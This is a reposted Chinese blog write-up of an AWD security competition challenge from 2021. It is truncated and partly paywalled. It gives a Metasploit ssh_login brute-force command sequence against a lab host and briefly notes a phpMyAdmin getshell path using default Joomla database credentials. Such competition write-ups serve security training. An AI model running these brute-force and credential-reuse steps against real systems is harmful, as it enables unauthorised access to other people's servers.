热门标签
当前位置: article > 正文
2021一带一路暨金砖大赛之企业信息系统安全赛项AWD_writeup_信息安全金砖比赛考什么
作者:tf789 | 2024-01-17 18:04:11
赞
踩
信息安全金砖比赛考什么
更多详情私聊博主
订阅专栏解锁更多~~觉得不错麻烦点个赞~~~
AWD_writeup 主要考点:后门账户、数据库操作、cve漏洞、后门漏洞、自动化攻击 1、解法一 ssh弱口令账户 用户登录后cat /etc/passwd 发现系统存在额外账户
使用msf进行ssh爆破尝试 msfconsole use auxiliary/scanner/ssh/ssh_login set rhost 192.168.2.162 set rport 22 set username administrator set pass_file /root/Desktop/top100.txt set verbose true run
2、解法二 phpmyadmin getshell 发现站点phpmyadmin 并且在 configuration.php文件中发现数据库连接用户和密码均为joomla
尝试登录,发现登录成功 执行 sh
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/article/detail/41113
推荐阅读
相关标签
